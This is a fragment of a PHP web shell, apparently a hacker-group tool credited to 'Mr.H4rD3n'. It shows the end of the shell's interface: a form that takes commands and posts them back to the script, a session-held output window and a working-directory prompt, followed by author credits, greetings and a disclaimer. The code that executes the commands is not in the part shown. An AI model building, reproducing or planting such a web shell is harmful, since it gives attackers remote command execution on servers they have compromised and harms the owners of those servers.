document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}

</script>
<style type="text/css">
body {font-family: sans-serif; color: black; background: white;}
table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
</style>
</head>

<body onload="init()" style="background-color:#000000">

<h2>POwER CoMMaNdE</h2>

<?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>

</div>
<div align="center">

<table cellpadding="0" cellspacing="0">
<tr><td class="head" style="color: #000000;"><b>PWD :</b></td>
<td class="head"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
</td></tr>
<tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
<textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
<input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
</p>

<? /*<p>
<input type="submit" value="Execute Command" />
<input type="submit" name="reset" value="Reset" />
Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
</p>
*/?>
</form></td></tr>
</div>
</table>

</div>
</body>
</html>
<?php ?><html><head><title>#Commanders - Private By Mr.H4rD3n - IsLamiC Warrior Team</title></head><body bgcolor="BLACK" background="http://localhost/a/matrix-animated-image.gif" style="background-color:#000000"></body></html></html><?php

}
//------------------------------------------------------------------------------------------------
?>

<?php
}
// End Shell
//-------------------------------------------------------------------------------------------------
?>
<br /><br /><br /><font color="#23B627"><br />

</font>

<div class="end">
<p align="center"><font color="#FFFFFF"><b>––•(-• © Copyright Mr.H4rD3n [All rights reserved] •-)•––</b><br />
</font><font face="Verdana"><font color="#23B627">
<a href="mailto:exploit-id@hotmail.com"><span style="text-decoration: none">
<font color="#000000">My Email</font></span></a></font> | <font color="#23B627">
<a href="http://facebook.com/Mr.H4rD3n"><span style="text-decoration: none">
<font color="#000000">Facebook</font></span></a></a></font><a href="http://facebook.com/Mr.H4rD3n"><span style="text-decoration: none"><font color="#000000">
</font></span></a>:) </font>
<font color="#FFFFFF"> <br />
\m/ <b>Greetz to</b> : Dr-AngeL - X-Line - Ghost.0f.Morocco - xMjahd - 4chrf -
KhantastiC - X internet - And yOu ! \m/<br />
&quot;&quot; WE ARE MUSLIMS, WE CAN NOT HARM ANY SITE I HOPE TO USE THIS TOOL ONLY WHAT
PLEASE GOD "" </font>
</p>
</div>
</body>
</html>